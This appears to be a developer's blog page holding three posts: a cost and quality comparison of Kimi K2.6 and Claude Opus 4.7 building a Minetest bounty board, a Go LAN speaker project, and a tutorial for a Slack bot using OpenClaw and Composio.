Forem: Shrijal Acharya

Kimi K2.6 vs. Claude Opus 4.7 in a Weird Game Coding Test ✅

Shrijal Acharya — Tue, 05 May 2026 13:04:03 +0000

Kimi K2.6 has been getting a lot of love lately, especially from devs who want a strong coding model without paying premium model prices every time they run a big prompt.

So I wanted to see how good this model actually is. But this time, I wanted to compare it with something much heavier, the developers darling Claude Opus 4.7.

On paper, Claude Opus 4.7 and Kimi K2.6 are very different models.

One is a premium frontier model from Anthropic. The other is Moonshot AI's much cheaper open model for coding and agentic tasks.

The pricing difference is pretty wild too. Claude Opus 4.7 costs $5/M input tokens and $25/M output tokens. Kimi K2.6 is listed at $0.95/M input tokens and $4/M output tokens, with cached input going even lower at $0.16/M tokens.

That is a pretty big gap.

So in this article, we'll see how the cheaper model, Kimi K2.6, does against Claude Opus 4.7.

For the test, I gave both models the same coding task: build a small Minetest (similar to Minecraft) bounty board with a TypeScript backend, then extend it with Google Sheets logging through Composio.

TL;DR

If you want the quick take, Claude Opus 4.7 clearly won this test, but it was painfully expensive.

Opus was better at the real task. The local build was cleaner, and it was the only one that got the real Google Sheets integration working.
Kimi did pretty well in Test 1. It got the local bounty board working for way less money, but it needed more debugging.
Test 2 changed the whole comparison. Opus was expensive, but it finished. Kimi just could not put it all together.

The cost difference was wild though.

For the first local bounty board test, Opus cost around $3.59, while Kimi came in at around $0.39. That is a huge gap. For the basic version, Kimi honestly did pretty well for the price.

But once the task got a little more real, the gap became way more obvious.

Opus got it working, even though it needed a little back and forth. The Google Sheets sync worked, and the project was modular enough that I could test the whole flow with two curl requests without even opening the game.

The painful part is that the Composio run alone cost $16 and took around 28min 52sec API time.

Kimi, on the other hand, burned 135k+ tokens, took around 25 minutes, cost around $5.03, and still did not really get any closer.

👀 So yeah, Kimi K2.6 is a usable and interesting cheaper model. But in this test, it could not really come close to Opus 4.7 for real-world coding.

Evaluation

I treated this like a real project, not a benchmark chart. Both models got the same prompts, and I compared the results based on whether it actually worked, how clean the code was, how much debugging it needed, how long it took, and how much it cost. That last one matters a lot here.

Setup

Same tasks and prompts for both models (Test 1: local-only bounty board, Test 2: real Composio Google Sheets sync).
Same target architecture: Minetest/Luanti Lua mod + TypeScript backend.
Same success criteria: /bounty flow works in-game, backend APIs behave correctly, and in Test 2 the completion is appended to Google Sheets via Composio.

What I measured

Functional correctness (most important): Did it work end-to-end with real verification?
- Local run: could a player generate, progress, and complete bounties without breaking state?
- Backend: did /health, /api/bounty/generate, /api/bounty/complete, and /api/leaderboard return the expected shapes?
- Test 2: did the Google Sheets append succeed, and could I validate it from the API without needing to be in the game?
Code quality and structure: modularity, clarity, and whether the repo was easy to reason about and test.
Debug burden: how many follow-ups were needed, how confusing the failure modes were, and whether issues were “real bugs” vs. “misconfiguration traps.”
Time: API time and wall time for each run.
Cost and token usage: input, output, cache behavior, and total run cost.
Practical ergonomics: whether I could validate quickly (for example, testing the full backend + Composio flow with curl).

How I verified outcomes

Test 1: ran the backend locally, joined a local Minetest world, used /bounty, and confirmed task tracking, rewards, and leaderboard persistence.
Test 2: verified the end-to-end sync by generating and completing a bounty via the backend API, and confirming a successful Google Sheets append through Composio.

Scoring approach

This was not a “unit test leaderboard” benchmark. It was a real build-and-ship check.

A model “wins” when the project works with minimal intervention.
A model “loses” when it cannot reach a working state in reasonable time/cost, even if parts of the code look promising.

Coding Test

For this test, I used the following CLI coding agents:

Claude Opus 4.7: Claude Code, Anthropic's terminal-based agentic coding tool

Kimi K2.6: OpenCode via OpenRouter

ℹ️ This is a practical coding test, so both models get the same prompt. I will compare time taken, code quality, token usage, cost, and all that stuff.

What are we building?

For this test, I wanted something small enough to verify properly, but still weird enough to show how each model handles an unusual idea.

So, we're building a simple Minetest/Luanti bounty board.

A player can join a local world, run /bounty, get a task like mining dirt or placing torches, and receive a reward after completing it.

After that, the backend records the completion, logs it to Google Sheets through Composio.

I get it, the concept is a little unusual on purpose.

Test Prompts

Both models received the same prompts for each test.

Test 1 Prompt: Local Bounty Board Prompt
Test 2 Prompt: Real Composio Integration Prompt

Test 1: Local Bounty Board

This first test is the basic version of the idea.

No external tools, no Composio. Just the game, the backend, and the local bounty flow working properly.

The goal was simple. A player runs /bounty, gets a task, completes it inside the game, and the backend tracks the progress without everything falling apart.

Claude Opus 4.7

Claude Opus 4.7 handled the first test really well.

The local bounty board worked end to end. It built the TypeScript backend, the Minetest/Luanti Lua mod, the command flow, progress tracking, rewards, and leaderboard persistence without needing a bunch of follow-up fixes.

The file structure also felt nice, which I had specifically asked for in the prompt:

The backend was built with Express, Zod, and Vitest. It also handled the boring stuff properly, which honestly matters a lot here:

npm test passed with 11/11 tests
npm run build passed cleanly
/health, /api/bounty/generate, /api/bounty/complete, and /api/leaderboard returned the right response shapes
incomplete bounty completions returned a clean 400

It created the Lua files cleanly, used minetest.request_http_api(), handled secure.http_mods, tracked digging and placing, stored player bounty state, and handled inventory rewards properly.

The whole run took around 12 minutes of API time, with about 23 minutes wall time. That is a bit longer than a quick web app build test, but for this kind of cross-stack project, it felt fair.

The cost came out to $3.59, which is definitely not cheap. But to be fair, the output was actually useful. It added a lot of code, but most of it was real implementation, not random filler like CONTRIBUTING.md, INSTALLATION.md, and all those extra files models sometimes create for no reason.

You can find the code it generated here: Claude Opus 4.7 Code

Here's the demo:

Cost: ~$3.59
Duration: 12min 3sec API time, 23min 53sec wall time
Code Changes: +1,688 lines, 0 lines removed
Token Usage:
- Input: 65
- Output: 54.8k
- Cache read: 2.8M
- Cache write: 129.8k

Quick Verdict

It worked end to end without much tweaking. I only had to configure ~/.minetest/minetest.conf and add this line:
secure.http_mods = bountyboard
Pretty much everything else was smooth. Great quick MVP.

I noticed one small issue: mine_node bounties can be farmed by placing and then re-mining the same blocks, because vanilla Minetest does not track who placed a node.

But that's fine. That is not really a code issue here.

Kimi K2.6

The core idea worked. Kimi created the TypeScript backend, the Minetest/Luanti mod, the bounty commands, task tracking, completion flow, rewards, and leaderboard logic.

The backend side looked solid enough. It used Express, Zod, and Vitest, and the main routes were there:

/health
/api/bounty/generate
/api/bounty/complete
/api/leaderboard

It also created the Lua mod files properly and handled the basic /bounty flow inside Minetest. The code was not bad either. I just felt like it was not as clean or modular as what Opus 4.7 wrote.

But there was one really irritating issue.

Somehow, Kimi wrote the global Minetest config in ~/.minetest/minetest.conf with this:

secure.http_mods = bountykimi

But then it also created a world config and added a different mod name there.

So when I loaded the world, Minetest used the world-level config. That basically overrode the global config behavior I was expecting. Because of that, the HTTP API was not enabled for the actual mod that was running.

This took me more than half an hour to debug.

And honestly, because I do not have much experience with Minetest config behavior, this was super annoying.

The run itself was much cheaper and faster than Opus. Kimi used around 52k context tokens, took about 9 minutes 27 seconds, and cost around $0.39.

That price difference is pretty wild. Opus cost around $3.59 for the first test, while Kimi came in under $0.40.

You can find the code it generated here: Kimi K2.6 Code

Here's the demo:

Cost: ~$0.39
Duration: ~9min 27sec
Code Changes: +4,671 lines, 0 lines removed
Context Used: 52,073 tokens
Context Window Used: 20%

Quick Verdict

The local bounty board idea worked, the code was usable, and the model clearly understood the Lua + TypeScript setup. But if you notice, Kimi wrote more than twice as much code as Opus 4.7.

The main problem was the Minetest config mess. It added secure.http_mods = bountykimi globally, but then created another world-level config with a different mod name, which made debugging way more painful.

So yeah, Kimi passed the first test, but not as smoothly as Opus.

Test 2: Real Composio Integration

Now this is where the actual test, and the fun, begins.

The custom mod is ready, so now it is time to integrate Composio and give the game a quick agentic touch.

The idea is simple. As players progress through the game, their bounty completions get logged into Google Sheets with Composio.

Claude Opus 4.7

Claude Opus 4.7 did manage to add the real Composio integration, but this one was not as smooth as Test 1.

The backend could sync bounty completions to Google Sheets. The nice thing is that I did not even need to open Minetest to test whether it was working. Because the project was structured cleanly, I could test the whole backend flow with just two curl requests.

First, generate a bounty:

curl -s -X POST http://localhost:8787/api/bounty/generate \
  -H 'Content-Type: application/json' \
  -d '{"player":"singleplayer","availableTasks":["collect_item"]}' \
  | tee /tmp/b.json | jq

Then complete it:

curl -s -X POST http://localhost:8787/api/bounty/complete \
  -H 'Content-Type: application/json' \
  -d "$(jq -nc \
        --argjson b "$(jq .bounty /tmp/b.json)" \
        --arg ts "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
        '{player:"singleplayer", bounty:$b, progress:{current:$b.target.count, required:$b.target.count}, completedAt:$ts}')" \
  | jq

And if everything is configured correctly, the second response looks like this:

{
  "ok": true,
  "message": "Bounty completed.",
  "leaderboard": {
    "player": "singleplayer",
    "points": 8,
    "completedBounties": 1
  },
  "sync": {
    "googleSheets": {
      "ok": true,
      "message": "Google Sheets row appended."
    }
  }
}

This is one of the things I love about Opus the most. It usually creates a pretty modular setup. The game mod, backend logic, and external sync were separated well enough that I could test the Composio part directly from the API without needing to run around inside the game every time.

It did run into a dev server issue where the tsx command was parsing watch incorrectly and treating it like the entry file.

After a bit of back and forth, it fixed the error. It eventually built a small runtime env loader and adjusted the config import so the backend could read the environment properly before the rest of the app booted.

After that, the build worked and the Google Sheets sync started working.

But that cost was painful. It literally cost me around $16. Like, actually :(. If you are not watching usage, this thing can make you broke real fast.

It took 28min 52sec API time, and about 1hr 17min wall time.

Apart from that, the code did work. But it cost way more than I expected for one run.

You can find the code it generated here: Claude Opus 4.7 Code - Composio

Here's the demo:

Cost: $16.03
Duration: 28min 52sec API time, 1hr 17min 40sec wall time
Code Changes: +1,848 lines, 507 lines removed
Token Usage:
- Input: 100.2k with Claude Haiku 4.5, plus Opus usage shown in the session
- Output: 3.2k with Claude Haiku 4.5, 123.3k with Claude Opus 4.7
- Cache read: 22.3M
- Cache write: 269.3k

Quick Verdict:

Claude Opus 4.7 got the real Composio integration working, especially the Google Sheets logging.

How cool is that? You add a custom agentic feature inside a game. A literal public game.

So yes, it worked. But $16 for this one run hurt.

Kimi K2.6

Kimi K2.6 did not do well on this test. It was pretty much busted.

From the start, it ran into a bunch of errors. The dev server broke, tests were failing, and even after a little handholding, it only managed to fix part of the test situation.

It eventually got past some of those failures, but the bigger problem was the actual Composio implementation. It did not seem fully sure how to wire the integration cleanly into the existing backend.

I had to stop and help again and again, but it still could not make meaningful progress with the build.

After spending more than 25 minutes and burning over 130k tokens, there was still no real progress. At that point, I had to stop the run.

Why on earth is it reading a version.txt file?

So yeah, I am calling this one a fail for Kimi K2.6.

Cost: ~$5.03
Duration: ~25min
Token Usage: 135,109+

Quick Verdict:

Kimi K2.6 failed this test.

It got stuck around tests, build issues, and the real Composio implementation. Even with manual help, it could not get the integration into a clean working state.

For the local bounty board, Kimi was surprisingly usable. But once the task moved into real external integration, it struggled a lot more.

Final Thoughts

Both Claude Opus 4.7 and Kimi K2.6 were pretty solid in this test, at least for the local version.

The task was not that simple either. It had Lua, TypeScript, SDK docs, backend logic, game commands, and the full flow had to work end to end.

Plus, the idea itself is not that common. Building an AI agent concept inside a custom game mod is not easy, and it is definitely not a one-shot thing, so props to both models.

Opus 4.7 did better overall. The code was cleaner, and as usual, Anthropic models are pretty good at that.

The only thing I hate with Anthropic models is the session limit.

I absolutely hate how little session usage you get. Opus 4.7 especially just eats through it completely in like 3 to 5 prompts.

Kimi K2.6 is an interesting model. Open models have not always been the best in my experience with real-world projects, but with every new model, my expectations rise a little.

Let's see where Kimi K2.6 goes from here.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

My speaker broke, so I built a LAN speaker

Shrijal Acharya — Tue, 28 Apr 2026 14:29:00 +0000

What's happening?

This was around a year back when I started the project, after a small speaker that I had broke out of nowhere. Won't connect.

I used it to listen to music every night before going to sleep (not sure if anybody else does the same, but it's one of my only fixed routines since childhood :D).

The idea

Okay, so what's the idea?

I had a thought. Why not build something resembling a speaker? Although I had never worked on a project that required working with audio and all that, I knew what I'd use to implement something like that, which was WebSocket (I'll explain why I chose it in a moment).

And I did start on it.

The irony is that I had just finished Tour of Go, Let's Go, Let's Go Further, and had just started on 100 Go Mistakes and How to Avoid Them.

So... I had to do this in Golang.

I had quite a good idea of how to work with Golang, so it had to be done with it, also because I wanted to get away from the JavaScript ecosystem (the same Node.js, React, Next.js, yada yada was just too much).

Why WebSocket

So, let's come to the plan. Why WebSocket?

The main reason is that when I had the idea, it was WebSocket that came to my mind, and it's what I thought of before even starting to code the project.

And WebSocket kind of makes sense as well. This was my thought process.

Lets you connect multiple connections from one device? Yes
Is synchronous enough when streaming over multiple devices in LAN? Yes
Something I've worked with a lot? Totally Yes

That's pretty much the reason I chose WebSocket. It might not be the best option, but it's what I had and something I was confident with when I started.

One more thing I'll add here: since I'm streaming audio frames sequentially (PCM chunks, one after another), I actually need them to arrive in order.

WebSocket runs over TCP, so that's handled for me. I don't have to think about it. That alone made it feel like the right call.

Why not WebRTC or UDP?

Let me tell you something pretty frankly: I never even knew there was something like WebRTC. I came across this term while building the project halfway through it.

So, why not UDP?

Okay, so UDP is connectionless, which means there's no guarantee that every packet arrives, and more importantly, no guarantee they arrive in order. For something like video calls or games, that's totally fine. You drop a frame, move on, nobody cares.

But for audio? If a chunk goes missing or arrives out of order, you either get silence or a glitch.

And since I'm streaming raw PCM (basically just a stream of bytes that represent sound), every single chunk matters. You can't just skip them.

So UDP was out as well.

And WebRTC? Also, WebRTC is mostly built around browser-to-browser, peer-to-peer stuff. My setup is a server broadcasting to multiple clients over LAN, which isn't really what WebRTC is designed for. So even if I knew about it from day one, I'm not sure it would've been the right fit anyway.

WebSocket was fine. It worked. And sometimes that's enough. I didn't want to overengineer.

👀 I learned about all these new terms like PCM, WebRTC, and all that stuff during the build. So, I might say something wrong. I'm not really that familiar with them. So, just hit me in the comments if so.

The Architecture

Okay, so the high level is pretty simple.

There's a server and there are clients. The server is where the music is stored, and the clients are the devices that play it (could be the same device).

Here's what actually happens when you press play:

The server takes the MP3 file, decodes it into raw PCM (basically just bytes of sound data), and starts broadcasting those bytes over WebSocket to every connected client. No client-side decoding. The server does all of that.

Here's a high level architecture:

The tricky part is sync. If you just start streaming, each client will start playing at slightly different times, and it'll sound like a little echo.

So what I did is, before playback starts, the server sends a timestamp to all clients saying, "Start playing at exactly this moment in time." Every client gets that timestamp, buffers the audio frames, and waits. When the clock hits that time, everyone starts together.

It works because on a LAN with NTP, all the device clocks are usually within a millisecond or two of each other. Close enough that you can't tell the difference (much).

That's the whole thing, honestly.

Server decodes -> broadcasts -> clients sync -> play

What I still don't know

Okay, so during the build, I ran into something I didn't fully understand.

Turns out your speaker doesn't play audio the exact moment you write data to it. There's some time it spends sitting in a system buffer before it actually comes out. And that delay varies by OS and audio system. On Linux, it's something around 50ms, I feel.

Honestly, I had no idea there was something like this that you need to account for. This thing was completely debugged by GPT-5.4. There's a hardcoded 50ms constant in the code that is counted when clients actually start playing.

There's also something in the code that keeps checking, roughly every second, whether the audio playing on your device is slightly ahead or behind.

If it is, it quietly adds or removes a tiny bit of audio to bring it back in line. So small you'd never hear it.

Both of these kind of work. I tested it. I just couldn't tell you exactly why the numbers are what they are.

How I usually run it

Since my plan is to use my whole laptop as a "speaker", I usually have the server and client on the same system (my personal laptop).

And I usually have it like this:

Start the server:

gophercast serve # now follow the TUI setup....

Connect clients (each in a tmux split). Usually, I have around 2 clients when running on the same machine. More than 2 kind of distorts the audio quality.

gophercast play --host <ip_from_serve> --port 8080 --name "client 1"
gophercast play --host <ip_from_serve> --port 8080 --name "client 2"

The steps are the same when connecting from multiple machines. Just make sure that all of them are connected to the same LAN.

Here's a quick demo on a single machine, working as the speaker.
(Ignore the audio quality)

My take

I'm pretty happy with how this worked out.

This was my very first time working with Charm's Bubbletea and the whole audio stuff.

I started this project just because I wanted to DIY. It was just the perfect time: my speaker broke, and I had somehow finished learning basic Go programming.

There's probably still a ton of bugs. I've tried to test most of it. I just picked the tool I knew and figured it out as I went.

It plays music across multiple devices in sync, or the same one if you connect through multiple terminals. My laptop, another computer, whatever's connected, all playing together.

That's what I wanted. That's what it does.

(I haven't tested how well it works on Mac, so I can't tell there. Also, I'm not sure Windows will work either due to oto's limitation and our hardcoded 50ms delay.)

You can find the repo here: shricodev/gophercast

🚀 Want to build such cool stuff? You learn hands on here: CodeCrafters

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

How to Automate Your Slack Workspace with OpenClaw and Composio 🚀

Shrijal Acharya — Thu, 16 Apr 2026 15:19:55 +0000

Your team already lives in Slack. Code reviews, project updates and what not, it all happens there.

But the moment you need to file a GitHub issue, check a Linear ticket, or send a follow-up email, you leave Slack, do the thing, and come back. That context switch adds up.

What if your Slack workspace had an assistant that could do all of that for you, right in the thread. That too an isolated OpenClaw instance per user with admin control? 🤯

In this article, you'll learn how to automate an entire Slack team workspace that connects to your tools, takes actions, without you ever leaving Slack.

What's Covered

To quickly summarize what we’ll cover in this blog post, here’s what we’ll go through:

The idea behind building a Slack bot around OpenClaw.
How Composio lets each user connect their own tools.
How OpenClaw powers replies and tool usage.

These are a few things you'll understand, but there's so many others you'll learn along the way.

So, if you want to build a Slack-first (though not limited to) AI with personal tool access for each user, this will give you a solid starting point.

What we're building

We're building a Slack bot that brings OpenClaw into Slack.

💁 Not necessarily only for Slack, you can use pretty much the same setup for something like Discord with their SDK or your custom app. The idea remains the same.

Overall the idea is to use OpenClaw and give every user in a workspace their own single instance of it which powers the AI assistant.

That way, things are isolated per user and the admin can control/limit the toolkits (GitHub, Linear, etc.) the users get access to.

Each user can connect their own tools with Composio, so the bot can chat, and take actions using the tools they’ve authorized.

Here's a quick architecture.

Why Slack and how to create a Slack App?

No big reason to choose Slack, only because it supports slash commands, and it's mostly where people already work.

For this, we first need to have a Slack app, if you don't already have one, follow the quickstart guide to create one.

Once your app is created, enable Socket Mode so the bot can receive events without exposing a public webhook URL.

Then add at least these Bot Token Scopes:

app_mentions:read
chat:write
commands
im:history
im:read
users:read

Subscribe to these Bot Events:

app_mention
message.im

And create these Slash commands:

/connect: Use it something like /connect <toolkit>
/connections: User lists active connections
/help: Shows usage summary
/assign: Admin assigns an OpenClaw instance to a user
/add-mcp-config: Admin registers an MCP Config from platform.composio.dev
/add-auth-config: Admin links a toolkit to its Composio auth config
/list-mcp-configs: Admin lists all registered MCP Configs

Finally copy these values to your .env file, which you can find in the app settings:

SLACK_BOT_TOKEN=xoxb-...
SLACK_APP_TOKEN=xapp-...
SLACK_SIGNING_SECRET=...

Your SLACK_BOT_TOKEN is the bot token itself, SLACK_APP_TOKEN is the Socket Mode app level token and SLACK_SIGNING_SECRET is used by Slack to verify requests.

How to Set Up the Project

It's fairly simple to get this project up and running. Follow these steps:

git clone https://github.com/shricodev/saas-openclaw-slackbot.git
cd saas-openclaw-slackbot

Next, you install the dependencies:

npm install

Then set up the environment variables and run the development server:

# Slack
SLACK_BOT_TOKEN=xoxb-...
SLACK_APP_TOKEN=xapp-...
SLACK_SIGNING_SECRET=...

# Database
DATABASE_URL=...

# Composio api key (ak...) from https://platform.composio.dev
COMPOSIO_API_KEY="ak_..."

To get the Composio API key:

Log in at platform.composio.dev
Copy your API key (ak_..) from the Composio dashboard settings, then set it:

Configure Composio Dedicated MCP Server

In this section, we'll go through the process of creating a dedicated MCP server in Composio for each user.

First, head over to platform.composio.dev
Under the MCP Configs tab, create a Dedicated MCP Server. This lets you create MCP servers with specific apps and tools, which is exactly what we want.

Select all the toolkits you plan to assign for the user and create the MCP server.

For the External User ID, use the user's Slack user ID. To get someone's Slack user ID, head over to their profile, click the three dots, and select Copy Member ID.

Use that as the External User ID.

Keep note of the MCP config name and MCP config ID. You will need both when configuring the bot in Slack.

Upon successful creation, you'll find the URL:

You can copy this URL directly and add it to the OpenClaw config, which we’ll cover later in the Configure OpenClaw with Composio section. Alternatively, the bot can fetch it for you after you run the /assign slash command, which we’ll configure later.

You will also need the auth config ID tied to the tools you selected. In the MCP server, head over to the Manage Config tab and click Manage Auth Config. The auth config ID is listed on that page.

Keep note of this as well. You will need it when running /add-auth-config in Slack.

Core Components in the Application

We're not going to code everything from scratch as that'd be too long and impractical. Let's go over some of the core components in the project.

Before we start with the project core components, here's the project tech stack:

Slack Bolt - Official Slack bot framework. We use it with Socket Mode, which connects to Slack over a WebSocket without needing a public HTTP endpoint.
OpenClaw - The agent layer. Exposes an OpenAI-compatible API but acts as a full agentic gateway that plans, calls tools, and reasons over results.
Composio - The core of the project. Manages OAuth connections to external apps like GitHub, Linear, and Gmail, and exposes them to the agent via MCP.
TypeScript - Obvious choice over JavaScript as we get type safe code.
PostgreSQL + Prisma - Handles user records, connection status, and per-thread conversation history.

Bootstrapping the Bot

This is where everything starts. We initialize the Slack Bolt app with Socket Mode, register all handlers, and start the server.

// 👇 app.ts

const app = new App({
  token: process.env.SLACK_BOT_TOKEN,
  appToken: process.env.SLACK_APP_TOKEN,
  signingSecret: process.env.SLACK_SIGNING_SECRET,
  socketMode: true,
});

registerMessageHandlers(app);
registerCommandHandlers(app);

(async () => {
  const port = Number(process.env.PORT) || 3000;
  await app.start(port);
  console.log(`Bot is running on port ${port} (socket mode)`);
})();

Instead of exposing a public HTTP endpoint for Slack to POST events to, Socket Mode opens a WebSocket connection. This means you can run the bot anywhere could be your local machine, a private server without a public URL.

If you've worked with bots before, this should be pretty straight-forward to understand. 👀

Handling User Messages

This is the brain of the bot. It handles both direct messages and @mentions in channels.

// 👇 message.handler.ts

async function handleUserMessage({
  message,
  client,
  text,
  channelId,
  threadTs,
}) {
  await saveMessage(
    slackUserId,
    slackTeamId,
    channelId,
    threadTs,
    "user",
    text,
  );

  const history = await getThreadHistory(
    slackUserId,
    slackTeamId,
    channelId,
    threadTs,
  );
  const priorHistory = history.slice(0, -1);

  const thinkingMsg = await client.chat.postMessage({
    channel: channelId,
    thread_ts: threadTs,
    text: "_Thinking..._",
  });

  const response = await generateResponse(
    openclawConfig.gatewayUrl,
    openclawConfig.gatewayToken,
    text,
    priorHistory,
    sessionKey,
  );

  await saveMessage(
    slackUserId,
    slackTeamId,
    channelId,
    threadTs,
    "assistant",
    response.content,
  );

  await client.chat.update({
    channel: channelId,
    ts: thinkingMsg.ts,
    text: response.content,
  });
}

There's a few things you might notice right up:

First, we store the user's message to the database before sending it to OpenClaw. But why? This way if the request fails, the history isn't broken. Similar to storing chat history in localhost when creating web chat applications.

I do not know if there’s a better way to handle this, but right now we just show a Thinking... message while the AI is generating the full response, and then replace it once the final output is ready.

A little hacky, maybe, but it gets the job done. There are probably better ways to handle this, like streaming the response, but for now the old-school approach works. 😋

Slash Commands

The bot exposes seven slash commands split into two groups: user-facing (/connect, /connections, /help) and admin-only (/assign, /add-mcp-config, /add-auth-config, /list-mcp-configs).

/connect

/connect <toolkit> starts an OAuth flow for a tool like GitHub or Gmail. But unlike the previous version where any user could connect any toolkit, now the bot checks three things before starting a connection:

Does this user have an MCP Config assigned?
Is the requested toolkit in that config?
Is there an auth config registered for this toolkit?

// 👇 command.handler.ts

app.command("/connect", async ({ command, ack, respond }) => {
  await ack();
  const toolkitSlug = command.text.trim().toLowerCase();
  const apiKey = getComposioApiKey();

  const assignment = await db.mcpConfigAssignment.findUnique({
    where: {
      slackUserId_slackTeamId: {
        slackUserId: command.user_id,
        slackTeamId: command.team_id,
      },
    },
    include: { mcpConfig: true },
  });

  if (!assignment) {
    await respond({
      response_type: "ephemeral",
      text: "You have not been assigned an MCP Config. Ask your admin to run `/assign`.",
    });
    return;
  }

  if (!assignment.mcpConfig.toolkitSlugs.includes(toolkitSlug)) {
    await respond({
      response_type: "ephemeral",
      text:
        "This toolkit is not available in your assigned config. " +
        "Your admin controls which toolkits you can access.",
    });
    return;
  }

  const toolkitAuth = await db.mcpToolkitAuth.findUnique({
    where: {
      slackTeamId_toolkitSlug: {
        slackTeamId: command.team_id,
        toolkitSlug,
      },
    },
  });

  // check if already connected
  const connectedToolkits = await getConnectedToolkits(apiKey, command.user_id);
  if (connectedToolkits.includes(toolkitSlug)) {
    await respond({
      response_type: "ephemeral",
      text: `You're already connected to *${toolkitSlug}*.`,
    });
    return;
  }

  const redirectUrl = await initiateConnection(
    apiKey,
    toolkitAuth.authConfigId,
    command.user_id,
  );

  await respond({
    response_type: "ephemeral",
    text: `Click here to connect *${toolkitSlug}*: ${redirectUrl}`,
  });
});

The response is only visible to the user who ran the command. That's intentional as OAuth URLs are personal and shouldn't be visible to the whole channel.

/assign

/assign is admin-only and lets admins assign a specific OpenClaw gateway to a user. It opens a Slack modal to collect the gateway URL, token and MCP config server ID.

// 👇 command.service.ts

app.command("/assign", async ({ command, ack, respond, client }) => {
  await ack();

  const userInfo = await client.users.info({ user: command.user_id });
  const isAdmin = userInfo.user?.is_admin || userInfo.user?.is_owner;

  if (!isAdmin) {
    await respond({
      response_type: "ephemeral",
      text: "Only workspace admins can assign OpenClaw instances.",
    });
    return;
  }

  await client.views.open({
    trigger_id: command.trigger_id,
    view: assignInstanceModal, // includes gateway URL, token, and MCP Config ID fields
  });
});

The user's MCP URL looks something like this: https://backend.composio.dev/v3/mcp/aaa-111/mcp?user_id=<slack_user_id>

It's the key because it's what connects the user's OpenClaw instance to the toolkits the admin selected for them.

/add-mcp-config and /add-auth-config

These two admin commands register the Composio resources in the bot's database. Both open modals.

/add-mcp-config registers an MCP Config by name and server ID:

// On modal submit:
await db.mcpConfig.create({
  data: {
    slackTeamId: teamId,
    composioServerId, // the UUID from the MCP URL
    name, // e.g. "Engineering"
    toolkitSlugs, // e.g. ["github", "linear"]
  },
});

/add-auth-config links a toolkit slug to its Composio auth config ID. This is what /connect uses to know which auth config to pass when initiating a connection:

// On modal submit:
await db.mcpToolkitAuth.upsert({
  where: {
    slackTeamId_toolkitSlug: { slackTeamId: teamId, toolkitSlug },
  },
  create: { slackTeamId: teamId, toolkitSlug, authConfigId },
  update: { authConfigId },
});

/list-mcp-configs

A simple admin command that lists all registered MCP Configs for the workspace:

"Engineering" - server: - toolkits: github, linear
"Sales" - server: - toolkits: gmail, notion

Sending Requests to OpenClaw

Up until this point we were working on the Slack side and a bit of Composio setup, but how do we actually send these messages to OpenClaw?

OpenClaw exposes an OpenAI-compatible /v1/chat/completions endpoint. Our service code wraps that with a proper system prompt, conversation history, and error handling. Nothing super unknown to most of you.

// 👇 openclaw.service.ts

export async function generateResponse(
  gatewayUrl: string,
  gatewayToken: string,
  userMessage: string,
  history: Array<{ role: string; content: string }>,
  sessionKey?: string,
): Promise<OpenClawResponse> {
  const systemPrompt: ChatMessage = {
    role: "system",
    content:
      "You are a helpful assistant in a Slack workspace. " +
      "You have access to the user's connected tools (GitHub, Linear, Gmail, etc.) through Composio. " +
      "The user's tools are already connected. Do not ask them to connect or authenticate. " +
      "Use the available Composio tools directly to answer questions. " +
      "Be concise. Format responses for Slack (use mrkdwn syntax).",
  };

  const messages: ChatMessage[] = [
    systemPrompt,
    ...history.map((m) => ({
      role: (m.role === "user" ? "user" : "assistant") as "user" | "assistant",
      content: m.content,
    })),
    { role: "user", content: userMessage },
  ];

  return sendToOpenClaw(gatewayUrl, gatewayToken, messages, sessionKey);
}

We also wrap the raw fetch in a custom OpenClawError class with error codes for timeouts, auth failures, and gateway errors. Preferred thing you do in a real-world codebase.

💡 Prefer something built-in like fetch over third-party tool like axios. Especially now after the recent compromise of axios which is used by hundreds and thousands of applications.

Connecting tools with Composio

You might be familiar working with Composio over the SDK @composio/core.

But with Composio, you can also directly talk to it's REST API. We now talk to the Composio REST API on backend.composio.dev using an API key from platform.composio.dev.

There are only three functions in the service, and each one does exactly what the name suggests 🤌

Check what a user has connected:

// 👇 composio.service.ts

export async function getConnectedToolkits(
  apiKey: string,
  slackUserId: string,
): Promise<string[]> {
  const url = `${COMPOSIO_API_BASE}/connected_accounts?user_id=${encodeURIComponent(slackUserId)}`;
  const res = await fetch(url, {
    method: "GET",
    headers: { "x-api-key": apiKey },
    signal: AbortSignal.timeout(30_000),
  });

  const data = await res.json();
  return data.items
    .filter((account) => account.status === "ACTIVE")
    .map((account) => account.toolkit.slug);
}

Initiate a new connection:

// 👇 composio.service.ts

export async function initiateConnection(
  apiKey: string,
  authConfigId: string,
  slackUserId: string,
): Promise<string> {
  const url = `${COMPOSIO_API_BASE}/connected_accounts`;
  const res = await fetch(url, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      "x-api-key": apiKey,
    },
    body: JSON.stringify({
      auth_config: { id: authConfigId },
      connection: { user_id: slackUserId },
    }),
    signal: AbortSignal.timeout(30_000),
  });

  const data = await res.json();
  return data.redirect_url;
}

Build the per-user MCP URL:

// 👇 composio.service.ts

export function getMcpUrl(
  composioServerId: string,
  slackUserId: string,
): string {
  return `https://backend.composio.dev/v3/mcp/${composioServerId}/mcp?user_id=${encodeURIComponent(slackUserId)}`;
}

This last one is the most important. There's no API call, it's pure URL construction. But this URL is what ties everything together: the composioServerId controls which toolkits are available, and
the user_id scopes which credentials are used. When /assign runs, it computes this URL and shows it to the admin so they can configure it in the user's OpenClaw instance.

Persisting Users and Conversation

Every Slack user that messages the bot gets a record in our database keyed on (slackUserId, slackTeamId) pair. This is a safety net, as the same Slack user ID could theoretically exist across different workspaces.

// 👇 slack-user.service.ts

export async function resolveSlackUser(
  slackUserId: string,
  slackTeamId: string,
) {
  const existing = await db.slackUser.findUnique({
    where: { slackUserId_slackTeamId: { slackUserId, slackTeamId } },
  });

  if (existing) return existing;

  return db.slackUser.create({
    data: {
      slackUserId,
      slackTeamId,
      composioEntityId: `slack_${slackTeamId}_${slackUserId}`,
    },
  });
}

Conversation history is stored per-thread using Slack's thread_ts (the timestamp of the first message in a thread) as the thread id. When the bot receives a message, it fetches the full thread history and passes it to OpenClaw, giving it the memory for the duration of that thread.

Configuration Setup

